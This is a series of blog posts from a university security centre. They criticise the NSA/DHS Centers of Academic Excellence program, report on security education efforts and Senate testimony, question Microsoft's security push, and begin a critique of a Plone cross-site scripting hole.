Posts in Infosec Education

Centers of ... Adequacy, Revisited

Almost two years ago I wrote in this blog about how CERIAS (and Purdue) was not going to resubmit for the NSA/DHS Centers of Academic Excellence program.

Some of you may notice that Purdue is listed among this year's (2010) group of educational institutions receiving designation as one of the CAEs in that program. Specifically, we have received designation as a CAE-R (Center of Academic Excellence in Research).

"What changed?" you may ask, and "Why did you submit?"

The simple answers are "Not that much," and "Because it was the least-effort solution to a problem." A little more elaborate answers follow. (It would help if you read the previous post on this topic to put what follows in context.)

Basically, the first three reasons I listed in the previous post still hold:

  1. The CAE program is still not a good indicator of real excellence. The program now has 125 designated institutions, ranging from top research universities in IA (e.g., Purdue, CMU, Georgia Tech) to 2-year community colleges. To call all of those programs "excellent" and to suggest they are equivalent in a meaningful way is unfair to students who wish to enter the field, and unfair to the people who work at all of those institutions. I have no objection to labeling the evaluation as a high-level evaluation of competence, but "excellence" is still not appropriate.   
  2. The CNSS standards are still used for the CAE and are not really appropriate for the field as it currently stands. Furthermore, it the IACE program used to certify CNSS compliance explicitly notes "The certification process does not address the quality of the presentation of the material within the courseware; it simply ensures that all the elements of a specific standard are included.." How the heck can a program be certified as "excellent" when the quality is not addressed? By that measure, a glass of water is insufficient, but drowning someone under 30ft of water is "excellent."
  3. There still are no dedicated resources for CAE schools. There are several grant programs and scholarships via NSF, DHS and DOD for which CAE programs are eligible, but most of those don't actually require CAE status, nor does CAE status provide special consideration.

What has changed is the level of effort to apply or renew at least the CAE-R stamp. The designation is now good for 5 academic years, and that is progress. Also, the requirements for the CAE-R designation were easily satisfied by a few people in a matter of several hours mining existing literature and research reports. Both of those were huge pluses for us in submitting the application and reducing the overhead to a more acceptable level given the return on onvestment.

The real value in this, and the reason we entered into the process, is that a few funding opportunities have indicated that applicants' institutions must be certified as a CAE member or else the applicant must document a long list of items to show "equivalence." As our faculty and staff compete for some of these grants, the cost-benefit tradeoff suggested that a small group to go through the process once, for the CAE-R. Of course, this raises the question of why the funding agencies suggest that XX Community College is automatically qualified to submit a grant, while a major university that is not CAE certified (MIT is an example) has to prove that it is qualified!

So, for us, it came down to a matter of deciding whether to stay out of the program as a matter of principle, or submit an application to make life a little simpler for all of our faculty and staff when submitting proposals. In the end, several of our faculty & staff decided to do it over an afternoon because they wanted to make their own proposals simpler to produce. And, our attempt to galvanize some movement away from the CAE program produced huge waves of ...apathy... by other schools; they appear to have no qualms about standing in line for government cheese. Thus, with somewhat mixed feelings by some of us, we got our own block of curd, with an expiration date of 2015.

Let me make very clear -- we are very supportive of any faculty willing to put in the time to develop a program, and working to educate students to enter this field. We are also very glad that there are people in government who are committed to supporting that academic effort. We are in no way trying to denigrate any institution or individual involved in the CAE program. But the concept of giving a gold star to make everyone feel good about doing what should be the minimum isn't how we should be teaching, or about how we should be promoting good cybersecurity education.

(And I should also add that not every faculty member here holds the opinions expressed above.)

Own Your Own Space

I have been friends with Linda McCarthy for many years. As a security strategist she has occupied a number of roles -- running research groups, managing corporate security, writing professional books, serving as a senior consultant, conducting professional training....and more. That she isn't widely known is more a function of her not seeking it by having a blog or gaining publicity by publishing derivative hacks to software than it is anything else; There are many in the field who are highly competent and who practice out of the spotlight most of the time.

One of Linda's passions over the last few years has been in reaching out to kids -- especially teens -- to make them aware of how to be safe when online. Her most recent effort is an update to her book for the youngest computer users. The book is now published under the Creative Commons license. The terms allow free use of the book for personal use. That's a great deal for a valuable resource!

I'm enclosing the recent press release on the book to provide all the information on how to get the book (or selected chapters).

If you're an experienced computer user, this will all seem fairly basic. But that's the point -- the basics require special care to present to new users, and in terms they understand. (And yes, this is targeted mostly to residents of the U.S.A. and maybe Canada, but the material should be useful for everyone, including parents.)

Industry-Leading Internet Security Book for Kids, Teens, Adults Available Now as Free Download

Own Your Space® teams with Teens, Experts, Corporate Sponsors for Kids' Online Safety

SAN FRANCISCO, June 17 -- As unstructured summertime looms, kids and teens across the nation are likely to be spending more time on the Internet and texting.

Now, a free download is available to help them keep themselves safer both online and while using a cell phone.

Own Your Space®, the industry-leading Internet security book for youth, parents, and adults, was first written by Linda McCarthy, a 20-year network and Internet-security expert.

This all-new free edition -- by McCarthy, security pros, and dedicated teenagers -- teaches youths and even their parents how to keep themselves "and their stuff" safer online.

A collaboration between network-security experts, teenagers, and artists, the flexible licensing of Creative Commons, and industry-leading corporate sponsors, together have made it possible for everyone on the Internet to access Own Your Space for free via myspace.com/ownyourspace, facebook.com/ownyourspace.net, and www.ownyourspace.net.

"With the rise of high-technology communications within the teen population, this is the obvious solution to an increasingly ubiquitous problem: how to deliver solid, easy-to-understand Internet security information into their hands? By putting it on the Internet and their hard drives, for free," said Linda McCarthy, former Senior Director of Internet Safety at Symantec.

Besides the contributors' own industry experience, Own Your Space also boasts the "street cred" important to the book's target audience; this new edition has been overseen by a cadre of teens who range in age from 13 to 17.

"In this age of unsafe-Internet and risky-texting practices that have led to the deaths and the jailing of minors, I'm thankful for everyone who works toward and sponsors our advocacy to keep more youth safe while online and on cell phones," McCarthy said.

Everyone interested in downloading Own Your Space® for free can visit myspace.com/ownyourspace, facebook.com/ownyourspace.net, and www.ownyourspace.net. Corporations who would like to increase the availability of the book and promote child safety online through their hardware and Web properties can contact Linda McCarthy atlmccarthy@ownyourspace.net.

McCarthy is releasing the book in June to celebrate Internet Safety Month.

Having an Impact on Cybersecurity Education

The 12th anniversary of CERIAS is looming (in May). As part of the display materials for our fast-approaching annual CERIAS Symposium (register now!), I wanted to get a sense of the impact of our educational activities in addition to our research. What I found surprised me -- and may surprise many others!

Strategic Planning

Back in 1997, a year before the formation of CERIAS, I presented testimony before a U.S. House of Representatives hearing on "Secure Communications." For that presentation, I surveyed peers around the country to determine something about the capacity of U.S. higher education in the field of information security and privacy (this was before the term "cyber" was popularized). I discovered that, at the time, there were only four defined programs in the country. We estimated that there were fewer than 20 academic faculty in the US at that time who viewed information security other than cryptography as their primary area of emphasis. (The reason we excluded cryptography was because there were many people who were working in abstract mathematics that could be applied to cryptography but who knew extremely little about information security as a field, and certainly were not teaching it).

The best numbers I could come up with from surveying all those people was that, as of 1997, U.S. higher education was graduating only about three new Ph.D. students a year in information security, Thus, there were also very few faculty producing new well-educated experts at any level, and too small a population to easily grow new programs. I noted in my remarks that the output was too low by at least two orders of magnitude for national needs (and was at least 3-5 orders too low for international needs).

As I have noted before, my testimony helped influence the creations of (among other things) the NSA's CAE program and the Scholarship for Service program. Both provided some indirect support for increasing the number of Ph.D graduates and courses at all postsecondary levels. The SfS has been a qualified success, although the CAE program not so much.

When CERIAS was formed, one element of our strategic plan was to focus on helping other institutions build up their capacity to offer infosec courses at every level, as a matter of strategic leadership. We decided to do this through five concurrent approaches:

  1. Create new classes at every level at Purdue, across several departments
  2. Find ways to get more Ph.D.s through our program, and help place them at other academic institutions
  3. Host visitors and postdocs, provide them with additional background in the field for eventual use at other academic institutions
  4. Create an affiliates program with other universities and colleges to exchange educational materials, speakers, best practices, and more
  5. Create opportunities for enrichment programs for faculty at other schools, such as a summer certificate program for educators at 2 and 4-year colleges.

Our goal was not only to produce new expertise, but to retrain personnel with strong backgrounds in computing and computing education. Transformation was the only way we could see that a big impact could be made quickly.

Outcome

We have had considerable success at all five of these initiatives. Currently, there are several dozen classes in CERIAS focus areas across Purdue. In addition to the more traditional graduate degrees, our Interdisciplinary graduate degree program is small but competitive and has led to new courses. Overall, on the Ph.D. front, we anticipate another 15 Ph.D. grads this May, bringing the total CERIAS output of PhD.s over 12 years to 135. To the best of our ability to estimate (using some figures from NSF and elsewhere), that was about 25% of all U.S. PhDs in the first decade that CERIAS was in existence, and we are currently graduating about 20% of U.S. output. Many of those graduates have taught or still teach at colleges and universities, even if part-time. We have also graduated many hundreds of MS and undergrad students with some deep coursework and research experience in information security and privacy issues.

We have hosted several score post-docs and visiting faculty over the years, and always welcome more --- our only limitation right now is available funding. For several years, we had an intensive summer program for faculty from 2 and 4-year schools, many of which are serving minority and disadvantaged populations. Graduates of that program went on to create many new courses at their home institutions. We had to discontinue this program after a few years because of, again, lack of funding.

Our academic affiliates program ran for five years, and we believe it was a great success. Several schools with only one or two faculty working in the area were able to leverage the partnership to get grants and educational resources, and are now notable for their own intrinsic capabilities. We discontinued the affiliates program several years ago as we realized all but one of those partners had "graduated."

So, how can we measure the impact of this aspect of our strategic plan? Perhaps by simply coming up with some numbers....

We compiled a list of anyone who had been through CERIAS (and a few years of COAST, prior) who:

  • Got a PhD from within Purdue and was part of CERIAS
  • Did a postdoc with CERIAS to learn (more) about cybersecurity/privacy
  • Came as a visiting faculty member to learn (more) about cybersecurity/privacy
  • Participated in one of our summer institutes for faculty

We gathered from them (as many as we could reach) the names of any higher education institution where they taught courses related to security, privacy or cyber crime. We also folded in the names of our academic affiliates at which such courses were (or still are) offered. The resultant list has over 100 entries! Even if we make a somewhat moderate estimate of the number of people who took these classes, we are well into the tens of thousands of students impacted, in some way, and possibly above 100,000, worldwide. That doesn't include the indirect effect, because many of those students have gone on (or will) to teach in higher education -- some of our Ph.D. grads have already turned out Ph.D. grads who now have their own Ph.D. students!

Seeing the scope of that impact is gratifying. And knowing that we will do more in the years ahead is great motivation, too.

Of course, it is also a little frustrating, because we could have done more, and more needs to be done. However, the approaches we have used (and are interested in trying next) never fit into any agency BAA. Thus, we have (almost) never been able to get grant support for our educational efforts. And, in many cases, the effort, overhead and delays in the application processes aren't worth the funding that is available. (The same is true of many of our research and outreach activities, but that is a topic for another time.)

We've been able to get this far because of the generosity of the companies and agencies that have been CERIAS general supporters over the years -- thank you! Our current supporters are listed on the CERIAS WWW site (hint: we're open to adding more!). We're also had a great deal of support within Purdue University from faculty, staff and the administration. It has been a group effort, but one that has really made a positive difference in the world....and provides us motivation to continue to greater heights.

See you at the CERIAS Symposium!

Institutions

Here is the list of the 106 107 108 educational institutions [last updated 3/21,1600 EDT]:

  • Air Force Institute of Technology
  • Amrita Vishwa Vidyapeetham, Coimbatore, India
  • Brigham Young University
  • Cairo University (Egypt)
  • California State University Sacramento
  • California State University Long Beach
  • Carnegie Mellon University
  • Case Western Reserve University
  • Charleston Southern University
  • Chunggnam National University, Korea
  • College of Aeronautical Engineering, PAF Academy, Risalpur Pakistan
  • College of Saint Elizabeth
  • Colorado State University
  • East Tennessee State University
  • Eastern Michigan University
  • Felician College
  • George Mason University
  • Georgia Institute of Technology
  • Georgia Southern University
  • Georgetown University
  • Hannam University, Korea
  • Helsinki University of Technology (Finland)
  • Hong Kong University of Science & Technology
  • Illinois Wesleyan University
  • Indian Institute of Science, Bangalore
  • Indiana University-Purdue University, Fort Wayne
  • Indiana University-Purdue University, Indianapolis
  • International University, Bruchsal, Germany
  • Iowa State University
  • James Madison University
  • John Marshall School of Law
  • KAIST (Korea Advanced Institute of Science and Technology)
  • Kansas State University
  • Kennesaw State University
  • Kent State University
  • Korea University
  • Kyungpook National University, Korea
  • Linköpings Universitet, Linköping Sweden
  • Marquette University
  • Miami University of Ohio
  • Missouri Univ S&T
  • Murray State University
  • Myongji University, Korea
  • N. Georgia College & State Univ.
  • National Chiao Tung University, Taiwan
  • National Taiwan University
  • National University of Singapore
  • New Jersey Institute of Technology
  • North Carolina State University
  • Norwalk Community College
  • Oberlin College
  • Penn State University
  • Purdue University Calumet
  • Purdue University West Lafayette
  • Qatar University, Qatar
  • Queensland Institute of Technology, Australia
  • Radford University
  • Rutgers University
  • Sabanci University, Turkey
  • San José State University
  • Shoreline Community College
  • Simon Fraser University
  • Southwest Normal University (China)
  • Southwest Texas Junior College
  • SUNY Oswego
  • SUNY Stony Brook
  • Syracuse University
  • Technische Universität München (TU-Munich)
  • Texas A & M Univ. Corpus Christi
  • Texas A & M Univ. Commerce
  • Tuskegee University
  • United States Military Academy
  • Universidad Católica Boliviana San Pablo, Bolivia
  • Universität Heidelberg, Heidelberg, Germany
  • University of Albany
  • University of Calgary
  • University of California, Berkeley
  • University of Cincinnati
  • University of Connecticut
  • University of Dayton
  • University of Denver
  • University of Florida
  • University of Kansas
  • University of Louisville
  • University of Maine at Fort Kent
  • University of Maryland University College
  • University of Mauritius, Mauritius
  • University of Memphis
  • University of Milan, Italy
  • University of Minnesota
  • University of Mississippi
  • University of New Haven (CT)
  • University of New Mexico
  • University of North Carolina, Charlotte
  • University of Notre Dame
  • University of Ohio
  • University of Pittsburgh
  • University of Texas, Dallas
  • University of Texas, San Antonio
  • University of Trento (Italy)
  • University of Virginia
  • University of Washington
  • University of Waterloo
  • University of Zurich
  • Virginia Tech
  • Washburn University
  • Western Michigan University
  • Zayed University, UAE

What About the Other 11 Months?

October is "officially" National Cyber Security Awareness Month. Whoopee! As I write this, only about 27 more days before everyone slips back into their cyber stupor and ignores the issues for the other 11 months.

Yes, that is not the proper way to look at it. The proper way is to look at the lack of funding for long-term research, the lack of meaningful initiatives, the continuing lack of understanding that robust security requires actually committing resources, the lack of meaningful support for education, almost no efforts to support law enforcement, and all the elements of "Security Theater" (to use Bruce Schneier's very appropriate term) put forth as action, only to realize that not much is going to happen this month, either. After all, it is "Awareness Month" rather than "Action Month."

There was a big announcement at the end of last week where Secretary Napolitano of DHS announced that DHS had new authority to hire 1000 cybersecurity experts. Wow! That immediately went on my list of things to blog about, but before I could get to it, Bob Cringely wrote almost everything that I was going to write in his blog post The Cybersecurity Myth - Cringely on technology. (NB. Similar to Bob's correspondent, I have always disliked the term "cybersecurity" that was introduced about a dozen years ago, but it has been adopted by the hoi polloi akin to "hacker" and "virus.") I've testified before the Senate about the lack of significant education programs and the illusion of "excellence" promoted by DHS and NSA -- you can read those to get my bigger picture view of the issues on personnel in this realm. But, in summary, I think Mr. Cringely has it spot on.

Am I being too cynical? I don't really think so, although I am definitely seen by many as a professional curmudgeon in the field. This is the 6th annual Awareness Month and things are worse today than when this event was started. As one indicator, consider that the funding for meaningful education and research have hardly changed. NITRD (National Information Technology Research & Development) figures show that the fiscal 2009 allocation for Cyber Security and Information Assurance (their term) was about $321 million across all Federal agencies. Two-thirds of this amount is in budgets for Defense agencies, with the largest single amount to DARPA; the majority of these funds have gone to the "D" side of the equation (development) rather than fundamental research, and some portion has undoubtedly gone to support offensive technologies rather than building safer systems. This amount has perhaps doubled since 2001, although the level of crime and abuse has risen far more -- by at least two levels of magnitude. The funding being made available is a pittance and not enough to really address the problems.

Here's another indicator. A recent conversation with someone at McAfee revealed that new pieces of deployed malware are being indexed at a rate of about 10 per second -- and those are only the ones detected and being reported! Some of the newer attacks are incredibly sophisticated, defeating two-factor authentication and falsifying bank statements in real time. The criminals are even operating a vast network of fake merchant sites designed to corrupt visitors' machines and steal financial information.   Some accounts place the annual losses in the US alone at over $100 billion per year from cyber crime activities -- well over 300 times everything being spent by the US government in R&D to stop it. (Hey, but what's 100 billion dollars, anyhow?) I have heard unpublished reports that some of the criminal gangs involved are spending tens of millions of dollars a year to write new and more effective attacks. Thus, by some estimates, the criminals are vastly outspending the US Government on R&D in this arena, and that doesn't count what other governments are spending to steal classified data and compromise infrastructure. They must be investing wisely, too: how many instances of arrests and takedowns can you recall hearing about recently?

Meanwhile, we are still awaiting the appointment of the National Cyber Cheerleader. For those keeping score, the President announced that the position was critical and he would appoint someone to that position right away. That was on May 29th. Given the delay, one wonders why the National Review was mandated as being completed in a rush 60 day period. As I noted in that earlier posting, an appointment is unlikely to make much of a difference as the position won't have real authority. Even with an appointment, there is disagreement about where the lead for cyber should be, DHS or the military. Neither really seems to take into account that this is at least as much a law enforcement problem as it is one of building better defenses. The lack of agreement means that the tenure of any appointment is likely to be controversial and contentious at worst, and largely ineffectual at best.

I could go on, but it is all rather bleak, especially when viewed through the lens of my 20+ years experience in the field.  The facts and trends have been well documented for most of that time, too, so it isn't as if this is a new development. There are some bright points, but unless the problem gets a lot more attention (and resources) than it is getting now, the future is not going to look any better.

So, here are my take-aways for National Cyber Security Awareness:

  • the government is more focused on us being "aware" than "secure"
  • the criminals are probably outspending the government in R&D
  • no one is really in charge of organizing the response, and there isn't agreement about who should
  • there aren't enough real experts, and there is little real effort to create more
  • too many people think "certification" means "expertise"
  • law enforcement in cyber is not a priority
  • real education is not a real priority

But hey, don't give up on October! It's also Vegetarian Awareness Month, National Liver Awareness Month, National Chiropractic Month, and Auto Battery Safety Month (among others). Undoubtedly there is something to celebrate without having to wait until Halloween. And that's my contribution for National Positive Attitude Month.

This time, the Senate

On March 19, I had an opportunity to testify before the Senate Committee on on Commerce, Science, and Transportation. The hearing was entitled Cybersecurity -- Assessing Our Vulnerabilities and Developing An Effective Defense.

I was asked to include information on research problems, educational initiatives, and issues regarding the current state of cyber security in the nation.   As is usual for such things, the time between the invitation and the due date for written testimony was short. Thus, I didn't have the time to delve deeply into the topic areas, but could only address the things that I already had on hand -- including some posts from this blog that I had written before. The result was a little longer than the other statements, but I think I covered more ground.

One hint for people testifying before Congress on such things: you can't depend on how long you will have for spoken remarks, so be sure any points you want to make are in your written testimony. In this case, the hearing was limited to about 75 minutes because there were several votes scheduled on the Senate floor, and the committee needed to adjourn to allow the Senators to attend the votes. And, as is common for too many hearings, there weren't many of the committee members present; I believe the hearing began with only two of the 25 members present, and some movement of members in and out to reach a maximum of four seated at any one time. In this case, the chair (Senator Jay Rockefeller of West Virginia) apologized to us several times for the low turnout. However, many (all?) of the staff and aides were present, so I'm certain the gist of the testimony presented will be considered.Spaf testifying

The Senator made a nice introductory statement.

My written testimony is available on my website as well as the committee site. My oral statement was from rough notes that I modified on the fly as I listened to the other testimony (by Jim Lewis, Eric Weiss and Ed Amoroso). That statement, and the whole hearing, are available via the archived hearing webcast (my remarks start at about 46:30 into the webcast). If I get a transcribed version of those remarks, I will post them along with my written testimony on my website in the "US government" section.

Comments by the other speakers were good overall and I think we collectively covered a lot of ground. The questions from the Senators present indicated that they were listening and knew some of the problems in the area. The comments from Senator Nelson about the intrusions into his systems were surprising: several Senate security staff were present at the hearing and indicated to me that his remarks were the first they had heard of the incidents! So, the hearing apparently set off an incident-response exercise -- separate from responding to my presence in the building, that is. grin

Will this hearing make a difference? I don't know. I've been testifying and saying the same things for over a dozen years (this was my 8th Congressional hearing testimony) and things haven't gotten that much better...and may even be worse. Senator Rockefeller has indicated he intends to introduce legislation supporting more funding for students studying cyber security issues. There was some good news coverage of all this (e.g., FCW and CNet).

I am told that there will be more hearings by this committee. Some House committees have been holding hearings too, and the President's 60 day review continues apace. The added attention is great, but with the sudden interest by so many, the result may be more confusion rather than resolution.

Stay tuned.




As a reminder, if you want to know about my occasional postings such as this but don't want to subscribe to the RSS feed,  you can subscribe to the mailing list.

Also as a reminder, there is my tumble blog on security issues, with links to items on the news and WWW of possible interest to those who find my ramblings and rants of interest.

Centers of Academic .... Adequacy

History

Back in 1997, the year before CERIAS was formally established, I testified before Congress on the state of cyber security in academia. In my testimony, I pointed out that there were only four established research groups, and their combined, yearly PhD production was around 3 per year, not counting cryptography.

Also in that testimony, I outlined that support was needed for new centers of expertise, and better support of existing centers.

As a result of that testimony, I was asked to participate in some discussions with staff from OSTP, from some Congressional committees (notably, the House Science Committee), and Richard Clarke‘s staff in the Executive Office of the President. I was also invited to some conversations with leadership at the NSA, including the deputy director for information security systems (IAD) (Mike Jacobs). Those discussions were about how to increase the profile of the area, and get more people educated in information security.

Among the ideas I discussed were ones expanded from my testimony. They eventually morphed into the Scholarship for Service program, the NSF CyberTrust program, and the NSA Centers of Academic Excellence (CAE). [NB. I am not going to claim sole or primary credit for these programs. I know I came up with the ideas, briefed people about them, discussed pros & cons, and then those groups took them and turned them into what we got. None of them are quite what I proposed, but that is how things happen in DC.]

The CAE program was established by the NSA in late 1998. The CAE certification was built around courses meeting CNSS requirements. Purdue was one of the first seven universities certified as CAEs, in May of 1999. We remained in the CAE program until earlier this year (2008). In 2003, DHS became a co-sponsor of the program.

Why Purdue is No Longer a CAE

In 2007, we were informed that unless we renewed our CNSS certifications by the end of August, we would not be eligible for CAE renewal in 2008. This prompted discussion and reflection by faculty and staff at CERIAS. As noted above, the mapping of CNSS requirements to our classes is non-trivial. The CAE application was also non-trivial. None of our personnel were willing to devote the hours of effort required to do the processing. Admittedly, we could have “faked” some of the mapping (as we know some schools have done in the past), but that was never an option for us. We had other objections, too (see what follows).As a result, we did not renew the certifications, and we dropped out of the CAE program when our certification expired earlier this year.

Our decision was not made lightly—we nearly dropped out in 2004 when we last renewed (and were not grandfathered into the new 5 year renewal cycle, much to our annoyance), and there was continuing thought given to this over intervening years. We identified a number of issues with the program, and the overhead of the mapping and application process was not the only (or principal) issue.

First, and foremost, we do not believe it is possible to have 94 (most recent count) Centers of Excellence in this field. After the coming year, we would not be surprised if the number grew to over 100, and that is beyond silly. There may be at most a dozen centers of real excellence, and pretending that the ability to offer some courses and stock a small library collection means “excellence” isn’t candid.

The program at this size is actually a Centers of Adequacy program. That isn’t intended to be pejorative—it is simply a statement about the size of the program and the nature of the requirements.

Some observers and colleagues outside the field have looked at the list of schools and made the observation that there is a huge disparity among the capabilities, student quality, resources and faculties of some of those schools. Thus, they have concluded, if those schools are all equivalent as “excellent” in cyber security, then that means that the good ones can’t be very good (“excellent” means defining the best, after all). So, we have actually had pundits conclude that cyber security & privacy studies can’t be much of a discipline. That is a disservice to the field as a whole.

Instead of actually designating excellence, the CAE program has become an ersatz certification program. The qualifications to be met are for minimums, not for excellence. In a field with so few real experts and so little money for advanced efforts, this is understandable given one of the primary goals of the CAE program—to encourage schools to offer IA/IS programs. Thus, the program sets a relatively low bar and many schools have put in efforts and resources to meet those requirements. This is a good thing, because it has helped raise the awareness of the field. However, it currently doesn’t set a high enough bar to improve the field, nor does it offer the resources to do so.

Setting a low bar also means that academic program requirements are being heavily influenced by a government agency rather than the academic community itself. This is not good for the field because it means the requirements are being set based on particular application need (of the government) rather than the academic community’s understanding of foundations, history, guiding principles, and interaction with other fields. (E.g., Would your mathematics department base its courses on what is required to produce IRS auditors? We think not!) In practice, the CAE program has probably helped suppress what otherwise would be a trend by our community to discuss a formal, common curriculum standard. In this sense, participation in the CAE program may now be holding us back.

Second, and related, the CNSS standards are really training standards, and not educational standards. Some of them might be met by a multi-day class taught by a commercial service such as SANS or CSI—what does that say about university-level classes we map to them? The original CNSS intent was to provide guidance for the production of trained system operators—rather than the designers, researchers, thinkers, managers, investigators and more that some of our programs (and Purdue’s, in particular) are producing.

We have found the CNSS standards to be time-consuming to map to courses, and in many cases inappropriate, and therefore inappropriate for our students. Tellingly, in 9 years we have never had a single one of our grads ask us for proof that they met the CNSS standards because an employer cared! We don’t currently intend to offer courses structured around any of the CNSS standards, and it is past the point where we are interested in supporting the fiction that they are central to a real curriculum.

Third, we have been told repeatedly over the years that there might be resources made available for CAE schools if only we participated. It has never happened. The Scholarship for Service program is open to non-CAE schools (read the NSF program solicitation carefully), so don’t think of that as an example. With 100 schools, what resources could reasonably be expected? If the NSA or DHS got an extra $5 million, and they spread it evenly, each would get $50,000. Take out institutional overhead charges, and that might be enough for 1 student scholarship…if that. If there were 10 schools, then $500,000 each is an amount that might begin to make a difference. But over a span of nearly 10 years the amount provided has been zero, and any way you divide that, it doesn’t really help any of us. Thus, we have been investing time and energy in a program that has not brought us resources to improve. Some investment of our energy & time to bolster community was warranted, but that time is past.

Fourth, the renewal process is a burden because of the nature of university staffing and the time required. With no return on getting the designation, we could not find anyone willing to invest the time for the renewal effort.

Closing Comments

In conclusion, we see the CAE effort as valuable for smaller schools, or those starting programs. By having the accreditation (which is what this is, although it doesn’t meet ISO standards for such), those programs can show some minimal capabilities, and perhaps obtain local resources to enhance them. However, for major programs with broader thrusts and a higher profile, the CAE has no real value, and may even have negative connotations. (And no, the new CAE-R program does not solve this as it is currently structured.)

The CAE program is based on training standards (CNSS) that do not have strong pedagogical foundations, and this is also not appropriate for a leading educational program. As the field continues to evolve over the next few years, faculty at CERIAS at Purdue expect to continue to play a leading role in shaping a real academic curriculum. That cannot be done by embracing the CAE.

We are confident that people who understand the field are not going to ignore the good schools simply because they don’t have the designation, any more than people have ignored major CS programs because they do not have CSAB accreditation. We’ve been recognized for our excellence in research, we continue to attract and graduate excellent students, and we continue to serve the community. We are certain that people will recognize that and respond accordingly.

More importantly, this goes to the heart of what it means to be “trustworthy.” Security and privacy issues are based on a concept of trust and that also implies honesty. It simply is not honest to continue to participate in (and thereby support) a designation that is misleading. There are not 94 centers of excellence in information and cyber security in the US. You might ask the personnel at some of the schools that are so designated as to why they feel the need to participate and shore up that unfortunate canard.

<!——>

Confusion of Separation of Privilege and Least Privilege

Least privilege is the idea of giving a subject or process only the privileges it needs to complete a task.  Compartmentalization is a technique to separate code into parts on which least privilege can be applied, so that if one part is compromised, the attacker does not gain full access.  Why does this get confused all the time with separation of privilege?  Separation of privilege is breaking up a *single* privilege amongst multiple, independent components or people, so that multiple agreement or collusion is necessary to perform an action (e.g., dual signature checks).  So, if an authentication system has various biometric components, a component that evaluates a token, and another component that evaluates some knowledge or capability, and all have to agree for authentication to occur, then that is separation of privilege.  It is essentially an “AND” logical operation;  in its simplest form, a system would check several conditions before granting approval for an operation.  Bishop uses the example of “su” or “sudo”;  a user (or attacker of a compromised process) needs to know the appropriate password, and the user needs to be in a special group.  A related, but not identical concept, is that of majority voting systems.  Redundant systems have to agree, hopefully outvoting a defective system.  If there was no voting, i.e., if all of the systems always had to agree, it would be separation of privilege.  OpenSSH’s UsePrivilegeSeparation option is *not* an implementation of privilege separation by that definition, it simply runs compartmentalized code using least privilege on each compartment.

What security push?

[tags]Vista, Windows, security,flaws,Microsoft[/tags]

Update: additions added 4/19 and 4/24, at the end.

Back in 2002, Microsoft performed a “security standdown” that Bill Gates publicly stated cost the company over $100 million.  That extreme measure was taken because of numerous security flaws popping up in Microsoft products, steadily chipping away at MS’s reputation, customer safety, and internal resources.  (I was told by one MS staffer that response to major security flaws often cost close to $1 million each for staff time, product changes, customer response, etc.  I don’t know if that is true, but the reality certainly was/is a substantial number.)

Without a doubt, people inside Microsoft took the issue seriously.  They put all their personnel through a security course, invested heavily in new testing technologies, and even went so far as to convene an advisory board of outside experts (the TCAAB)—including some who have not always been favorably disposed towards MS security efforts.  Security of the Microsoft code base suddenly became a Very Big Deal.

Fast forward 5 years: When Vista was released a few months ago, we saw lots of announcements that it was the most secure version of Windows ever, but that metric was not otherwise qualified; a cynic might comment that such an achievement would not be difficult.  The user population has become habituated to the monthly release of security patches for existing products, with the occasional emergency patch.  Bundling all the patches together undoubtedly helps reduce the overhead in producing them, but also serves to obscure how many different flaws are contained inside each patch set.  The number of flaws maybe hasn’t really decreased all that much from years ago.

Meanwhile, reports from inside MS indicate that there was no comprehensive testing of personnel to see how the security training worked and no follow-on training.  The code base for new products has continued to grow, thus opening new possibilities for flaws and misconfiguration.  The academic advisory board may still exist, but I can’t find a recent mention of it on the Microsoft web pages, and some of the people I know who were on it (myself included) were dismissed over a year ago.  The external research program at MSR that connected with academic institutions doing information security research seems to have largely evaporated—the WWW page for the effort lists John Spencer as contact, and he retired from Microsoft last year.  The upcoming Microsoft Research Faculty Summit has 9 research tracks, and none of them are in security.

Microsoft seems to project the attitude that they have solved the security problem.

If that’s so, why are we still seeing significant security flaws appear that not only affect their old software, but their new software written under the new, extra special security regime, such as Vista and Longhorn?  Examples such as the ANI flaw and the recent DNS flaw are both glaring examples of major problems that shouldn’t have been in the current code: the ANI flaw is very similar to a years-old flaw that was already known inside Microsoft, and the DNS flaw is another buffer overflow!!  There are even reports that there may be dozens (or hundreds) of patches awaiting distribution for Vista.

Undoubtedly, the $100 million spent back in 2002 was worth something—the code quality has definitely improved.  There is greater awareness inside Microsoft about security and privacy issues.  I also know for a fact that there are a lot of bright, talented and very motivated people inside Microsoft who care about these issues.  But questions remain: did Microsoft get its money’s worth?  Did it invest wisely and if so, why are we still seeing so many (and so many silly) security flaws?  Why does it seem that security is no longer a priority?  What does that portend for Vista, Longhorn, and Office 2007?  (And if you read the “standdown” article, one wonders also about Mr. Nash’s posterior. grin )

I have great respect for many of the things Microsoft has done, and admiration for many of the people who work there.  I simply wish they had some upper management who would realize that security (and privacy) are ongoing process needs, not one-time problems to overcome with a “campaign.”

What do you think?

[posted with ecto]

Update 4/19: The TCAAB does still continue to exist, apparently, but with a greater focus on privacy issues than security.  I do not know who the current members might be.

Update 4/24: I have heard (informally) from someone inside Microsoft in informal response to this post.  He pointed out several issues that I think are valid and deserve airing here;

  1. Security training of personnel is on-going.  It still is unclear to me whether they are employing good educational methods, including follow-up testing, to optimize their instruction.
  2. The TCABB does indeed continue (and was meeting when I made the original post!).  It has undergone some changes since it was announced, but is largely the same as when it was formed.  What they are doing, and what effect they are having (if any), is unclear.
  3. Microsoft’s patch process is much smoother now, and bundled patches are easier to apply than lots of individual ones.  (However, there are still a lot of patches for things that shouldn’t be in the code.)
  4. The loss of outreach to academia by MSR does not imply they aren’t still doing research in security issues.

Many of my questions still remain unanswered, including Mr. Nash’s condition….

Do Open Source Devs Get Web App Security?  Does Anybody?

Note: I’ve updated this article after getting some feedback from Alexander Limi.

A colleague of mine who is dealing with Plone, a CMS system built atop Zope, pointed me to a rather disturbing document in the Plone Documentation system, one that I feel is indicative of a much larger problem in the web app dev community.

The first describes a hole (subsequently patched) in Plone that allowed users to upload arbitrary JavaScript.  Apparently no input or output filtering was being done.  Certainly anyone familiar with XSS attacks can see the potential for stealing cookie data, but the article seems to imply this is simply a spam issue:

Clean up link spam

Is this a security hole?
No. This is somebody logging in to your site (if you allow them to create their own users) and adding content that can redirect people to a different web site. Your server, site and content security is not compromised in any way. It’s just a slightly more sophisticated version of comment spam. If you open up your site to untrusted users, there will always be a certain risk that people add content that is not approved. It’s annoying, but it’s not a security hole.

